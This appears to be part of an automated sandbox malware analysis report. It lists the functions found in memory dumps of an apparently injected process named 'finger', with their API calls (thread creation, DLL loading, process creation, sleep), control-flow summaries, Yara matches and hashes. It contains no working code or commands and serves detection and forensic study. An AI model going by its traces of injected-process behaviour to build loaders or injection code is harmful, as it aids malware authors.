                                                                                                                                      • Opcode ID: a2199264b5924b261403d4d2b55124484ac8c18e55e02c45104fc9629f0feac1
                                                                                                                                      • Instruction ID: dd0b58c7a39d7e8e9949d90f9ea57ba4e8ebbf2163394817a70a8d1c7fcfe2aa
                                                                                                                                      • Opcode Fuzzy Hash: a2199264b5924b261403d4d2b55124484ac8c18e55e02c45104fc9629f0feac1
                                                                                                                                      • Instruction Fuzzy Hash: B390023130140802D104B5986408646015597E1311F59D011B9028556EC76589957131
                                                                                                                                      Function 035235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 5e6772e53dfbae4ccda48f6b2cd4e87811d962248f4a18bf9feda1d705ad38a4
                                                                                                                                      • Instruction ID: 4e6c8f0bb54a69e4706e9975d930340ee83d0ccf59775f735c07e0d42fc4b6c3
                                                                                                                                      • Opcode Fuzzy Hash: 5e6772e53dfbae4ccda48f6b2cd4e87811d962248f4a18bf9feda1d705ad38a4
                                                                                                                                      • Instruction Fuzzy Hash: B090023170550802D104B1585514706115597D1211F69C411B4428569D87958A5575A2
                                                                                                                                      Function 035239B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 0ecadbb0d8cf8112af9314da2867f3f63ab56247453bcad313d5ebe523219979
                                                                                                                                      • Instruction ID: b86ea708ac98e956adc6082725947038a169b5345c8c6dd229ac1d3b1a74fe51
                                                                                                                                      • Opcode Fuzzy Hash: 0ecadbb0d8cf8112af9314da2867f3f63ab56247453bcad313d5ebe523219979
                                                                                                                                      • Instruction Fuzzy Hash: 3090022134545502D154B15C54046164155B7E1211F59C021B4818595D865589597221
                                                                                                                                      Function 009B111D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112threadwindowCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 434 9b111d-9b1128 435 9b112a-9b112f 434->435 436 9b1118-9b1119 434->436 437 9b1101 435->437 438 9b1131-9b1143 435->438 439 9b1173-9b11da call 9cba70 call 9cc480 call 9b4920 call 9a1410 call 9c2060 437->439 440 9b1103-9b1109 437->440 441 9b1187-9b1190 call 9cc480 438->441 442 9b1145-9b114d 438->442 461 9b11fa-9b1200 439->461 462 9b11dc-9b11eb PostThreadMessageW 439->462 448 9b1191 441->448 444 9b116f-9b1171 442->444 445 9b114f-9b1151 442->445 444->439 449 9b115e-9b1164 445->449 450 9b1153 445->450 448->442 450->448 453 9b1155-9b115d 450->453 453->449 462->461 464 9b11ed-9b11f7 462->464 464->461
                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 009B11E7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                      • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                      • API String ID: 1836367815-3632291559
                                                                                                                                      • Opcode ID: 0081208f6dd57f68770a1c1c42c3083a2954b25e6953c5887d6391d41e5e1006
                                                                                                                                      • Instruction ID: 7d02aa3e0c962afa0ed4a7cec735d8660ea1b41fa31af960dde36991922cb245
                                                                                                                                      • Opcode Fuzzy Hash: 0081208f6dd57f68770a1c1c42c3083a2954b25e6953c5887d6391d41e5e1006
                                                                                                                                      • Instruction Fuzzy Hash: 6031C07294914D7FDB10DBA8AD91EEF7F6CEB413B4F408029FB44A7201E1254D028BE1
                                                                                                                                      Function 009B10F2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72threadwindowCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 465 9b10f2-9b1101 467 9b1173-9b11da call 9cba70 call 9cc480 call 9b4920 call 9a1410 call 9c2060 465->467 468 9b1103-9b1109 465->468 479 9b11fa-9b1200 467->479 480 9b11dc-9b11eb PostThreadMessageW 467->480 480->479 482 9b11ed-9b11f7 480->482 482->479
                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 009B11E7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                      • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                      • API String ID: 1836367815-3632291559
                                                                                                                                      • Opcode ID: 66a6f88af72d4e365fa4d9bd2ca2c5d7c34c5f2e02d8446cbf18e0e179952a5e
                                                                                                                                      • Instruction ID: 17d61b62a8ebc59dea9e727624db1e6c16610a73c418a0bd5b1efc416a721cc2
                                                                                                                                      • Opcode Fuzzy Hash: 66a6f88af72d4e365fa4d9bd2ca2c5d7c34c5f2e02d8446cbf18e0e179952a5e
                                                                                                                                      • Instruction Fuzzy Hash: B3110A72D0115C7AEB11D7A45C82EEF7B7CDF817A4F448064FA04B7142D6385D0687B1
                                                                                                                                      Function 009B1167 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 483 9b1167-9b116b 484 9b116d-9b11da call 9cba70 call 9cc480 call 9b4920 call 9a1410 call 9c2060 483->484 485 9b11e1-9b11eb PostThreadMessageW 483->485 486 9b11fa-9b1200 484->486 501 9b11dc-9b11e0 484->501 485->486 487 9b11ed-9b11f7 485->487 487->486 501->485
                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 009B11E7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                      • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                      • API String ID: 1836367815-3632291559
                                                                                                                                      • Opcode ID: 54435d0cc237de49655d9c7772ba73c378d7288e6792c91baacb45b8710684f0
                                                                                                                                      • Instruction ID: a5c5301ab585e604b5fe7716f99e33939a5949ab8898eff3432bd1216da7e455
                                                                                                                                      • Opcode Fuzzy Hash: 54435d0cc237de49655d9c7772ba73c378d7288e6792c91baacb45b8710684f0
                                                                                                                                      • Instruction Fuzzy Hash: 8A11E5B2D0514C7AEB11ABE48C91EEF7B7CDF817A4F048068FA04B7101E5385E068BB1
                                                                                                                                      Function 009B1170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 502 9b1170-9b11da call 9cba70 call 9cc480 call 9b4920 call 9a1410 call 9c2060 514 9b11fa-9b1200 502->514 515 9b11dc-9b11eb PostThreadMessageW 502->515 515->514 517 9b11ed-9b11f7 515->517 517->514
                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 009B11E7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                      • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                      • API String ID: 1836367815-3632291559
                                                                                                                                      • Opcode ID: b56bf9a4d39a1b653076afe1226ab24f033de7dd1a5767a26046ecfe28280db8
                                                                                                                                      • Instruction ID: fa812ea5ed8f00ff8cb6ab233fa3376d2e2cd985f95b3f3aa6131acc92018133
                                                                                                                                      • Opcode Fuzzy Hash: b56bf9a4d39a1b653076afe1226ab24f033de7dd1a5767a26046ecfe28280db8
                                                                                                                                      • Instruction Fuzzy Hash: 4101C4B2D0110C7AEB10ABE48C82EEF7B7CDF817A4F008069FA04B7141D6385E068BB1
                                                                                                                                      Function 009BF909 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 114COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeUninitialize
                                                                                                                                      • String ID: @J7<
                                                                                                                                      • API String ID: 3442037557-2016760708
                                                                                                                                      • Opcode ID: 9c2d70e9b7b165ad7369f29b5d7c6250e8d559375a5adedd44e5b5ab186539fa
                                                                                                                                      • Instruction ID: f009344012016816311ca64310501f9f547b5339fc76e78813112ff1e9f8596f
                                                                                                                                      • Opcode Fuzzy Hash: 9c2d70e9b7b165ad7369f29b5d7c6250e8d559375a5adedd44e5b5ab186539fa
                                                                                                                                      • Instruction Fuzzy Hash: 4D416476A002099FDB10DFD8DC819EEB7B9FF88314F108569E509EB214D771ED458BA0
                                                                                                                                      Function 009C3EB0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 009C3F8B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                                      • Opcode ID: 03d75427debc5d609b2eb6f7188f91b452b235da142fc21f9c8642c28b308a00
                                                                                                                                      • Instruction ID: 1d4693cd3e57aee72d9740be5a76539b8b751fe4254af6384a195db48db91191
                                                                                                                                      • Opcode Fuzzy Hash: 03d75427debc5d609b2eb6f7188f91b452b235da142fc21f9c8642c28b308a00
                                                                                                                                      • Instruction Fuzzy Hash: 5F3170B1A01605BBD714DFA4CC81FEBBBB9EB88714F40851DF6196B241D774AA40CBA2
                                                                                                                                      Function 009BF910 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeUninitialize
                                                                                                                                      • String ID: @J7<
                                                                                                                                      • API String ID: 3442037557-2016760708
                                                                                                                                      • Opcode ID: c8137104908ac9fc80c98f012a38db75d1e2c20981718af9eb5877e168ab6c8e
                                                                                                                                      • Instruction ID: 2b6b78dd6d7b6777ea19f8dc30caf4108c42a7e73f19bb9723386e6ddbabd8d2
                                                                                                                                      • Opcode Fuzzy Hash: c8137104908ac9fc80c98f012a38db75d1e2c20981718af9eb5877e168ab6c8e
                                                                                                                                      • Instruction Fuzzy Hash: 03311EB6A0060AAFDB00DFD8DC809EEB7B9BF88314F108559E515AB214D775AE458BA0
                                                                                                                                      Function 009B4913 Relevance: 1.6, APIs: 1, Instructions: 86libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009B4992
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: 88a25ceaf533c559e86a30bd475ebb1ba8dffb6508b14e3f06e286eddad8c3ba
                                                                                                                                      • Instruction ID: 74972c196215803506d32bf2570103e1cb4aa0f8ffa290a1a75e88d06f2111e3
                                                                                                                                      • Opcode Fuzzy Hash: 88a25ceaf533c559e86a30bd475ebb1ba8dffb6508b14e3f06e286eddad8c3ba
                                                                                                                                      • Instruction Fuzzy Hash: 42213675D0420EABDF20EB94ED41FFEB7799F51728F040199E8589B243F6329A18C791
                                                                                                                                      Function 009B4920 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009B4992
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                                                      • Instruction ID: e269df9d7bd88fa7922f109ae47fdb112695f7a783a661ed3c49f54e9a45aa7a
                                                                                                                                      • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                                                      • Instruction Fuzzy Hash: BD011EB5D0020DABDF10DAE4DD52FDEB7789B54708F0041A9F91897281F631EB19DB92
                                                                                                                                      Function 009C9D00 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,009B870E,00000010,?,?,?,00000044,?,00000010,009B870E,?,00000000,?), ref: 009C9D60
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                      • Opcode ID: 6644b415bad7e376847d335840e632c13dbe43a7532c77a696d293187108979b
                                                                                                                                      • Instruction ID: c5213bdbd081837eba641f77cfe1b21df64b95263e0cbdc44eb1d236d248c514
                                                                                                                                      • Opcode Fuzzy Hash: 6644b415bad7e376847d335840e632c13dbe43a7532c77a696d293187108979b
                                                                                                                                      • Instruction Fuzzy Hash: E601C0B2200108BFCB04DF89DC81EEB77ADEF8C714F408208BA09E3241D630F8518BA4
                                                                                                                                      Function 009A9DE0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 009A9E25
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                      • Opcode ID: e632c74228effe3e41c31b354731c6cee34354bdfa25a2039bb9058f3e46be74
                                                                                                                                      • Instruction ID: 7d3f3959082d8fc5632c4f3559cf2d8ce0e8f3609e9f05fb1a129c4646189148
                                                                                                                                      • Opcode Fuzzy Hash: e632c74228effe3e41c31b354731c6cee34354bdfa25a2039bb9058f3e46be74
                                                                                                                                      • Instruction Fuzzy Hash: FFF0657338031436D63066E9DC02FD7779CDBC5B61F14006AF60CEB1C1D992B40146E5
                                                                                                                                      Function 009A9DDC Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 009A9E25
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                      • Opcode ID: 3cba06b489093297e44dff315d1292046129d3ee91c62e4a20678e75f196146f
                                                                                                                                      • Instruction ID: c7864400c3ea1d60f9ff479fae7083cf5a6cd2be9425982fead1a19fc693f493
                                                                                                                                      • Opcode Fuzzy Hash: 3cba06b489093297e44dff315d1292046129d3ee91c62e4a20678e75f196146f
                                                                                                                                      • Instruction Fuzzy Hash: B2F092B668070036E231A7A8DC03F976A9D8BC5B11F14006AF708AB1C1D9A6B40087A9
                                                                                                                                      Function 009C9C20 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(009B1DE9,?,009C5BF3,009B1DE9,009C5AAF,009C5BF3,?,009B1DE9,009C5AAF,00001000,?,?,00000000), ref: 009C9C5C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: bb4ff64b5881db452091132d672183da247ee8d903e57c73fca0792ed643da86
                                                                                                                                      • Instruction ID: 26e42e0364de041b259438e3decc530a490374473c52b7a5606b86fad9181068
                                                                                                                                      • Opcode Fuzzy Hash: bb4ff64b5881db452091132d672183da247ee8d903e57c73fca0792ed643da86
                                                                                                                                      • Instruction Fuzzy Hash: 92E06D716003087FC614EE59DC81F9B77ADEFC9714F004408F908A7241D731B8108BB9
                                                                                                                                      Function 009C9C70 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,348F3D41,00000007,00000000,00000004,00000000,009B4185,000000F4), ref: 009C9CAC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                      • Opcode ID: 8cb8b7e952e22caa2dfb467c6a9fff9777dc7d5e733903d0db063a4f97bcd6c7
                                                                                                                                      • Instruction ID: bd5bff32766c4f5c01ccbaa12dfc2a19d1b7950440706a34dba653e742833532
                                                                                                                                      • Opcode Fuzzy Hash: 8cb8b7e952e22caa2dfb467c6a9fff9777dc7d5e733903d0db063a4f97bcd6c7
                                                                                                                                      • Instruction Fuzzy Hash: 5EE09AB23002087FD614EE5ADC42FAB77ADEFCA710F004008F908A7281D630BC108BBA
                                                                                                                                      Function 009B8750 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 009B877C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: 160c0f478dbb599c20a58c53704a0c371b5c0b0fa73cb7f23227027037c55759
                                                                                                                                      • Instruction ID: 9e362bbf0837d4041ac7e25630dfb3be6e79e482abf77355ada0fbe245083bc2
                                                                                                                                      • Opcode Fuzzy Hash: 160c0f478dbb599c20a58c53704a0c371b5c0b0fa73cb7f23227027037c55759
                                                                                                                                      • Instruction Fuzzy Hash: D9E0807624030417EB246669DD85FA7335C574C734F1C4561B91CDB5C2DE74F902C550
                                                                                                                                      Function 009B853D Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,009B20E0,009C83EF,009C5AAF,009B20B0), ref: 009B8573
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorMode
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                      • Opcode ID: 8baa53329ec217cb7499463543f5916ee93653386981487b4d276d87569bd488
                                                                                                                                      • Instruction ID: 3f6804aa40ebc2fcdcac16c9032aa9e20dc5a9050aa9be43c3df726de0b5c8df
                                                                                                                                      • Opcode Fuzzy Hash: 8baa53329ec217cb7499463543f5916ee93653386981487b4d276d87569bd488
                                                                                                                                      • Instruction Fuzzy Hash: 91E0C2757C42053EEB10E6B49C03F5B2A884B94340F044079B809E76C3DCA0E1008A91
                                                                                                                                      Function 009B8540 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,009B20E0,009C83EF,009C5AAF,009B20B0), ref: 009B8573
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorMode
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                      • Opcode ID: ec561b8a8f83b8c0cfb3fd323729bff6cdd967d7f4fe86c04794773a90c7fb8d
                                                                                                                                      • Instruction ID: 5d79a3192e90695d0a3365ed45a339387a2863edef88f791cecebc0e6a53741f
                                                                                                                                      • Opcode Fuzzy Hash: ec561b8a8f83b8c0cfb3fd323729bff6cdd967d7f4fe86c04794773a90c7fb8d
                                                                                                                                      • Instruction Fuzzy Hash: AED05E757843053BEA10E6A89C03F573A8C5B88750F048075BD08E76C3ECA5F51086A6
                                                                                                                                      Function 03522C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 311059229d700bd8ad4c4aeb40acfa1ac9d1c0620ee37dd16d2683d2d56fb0d3
                                                                                                                                      • Instruction ID: b299f3f0a05c1dc251b58ae3ffb50e513aad17bf1ddb25c82808f8925bca0218
                                                                                                                                      • Opcode Fuzzy Hash: 311059229d700bd8ad4c4aeb40acfa1ac9d1c0620ee37dd16d2683d2d56fb0d3
                                                                                                                                      • Instruction Fuzzy Hash: F2B02B319014C4C5DA00E32016087073E0077C1300F1DC061E2030243E0738C0C0F171

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 032E04E8 Relevance: .1, Instructions: 146COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587836704.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_32e0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
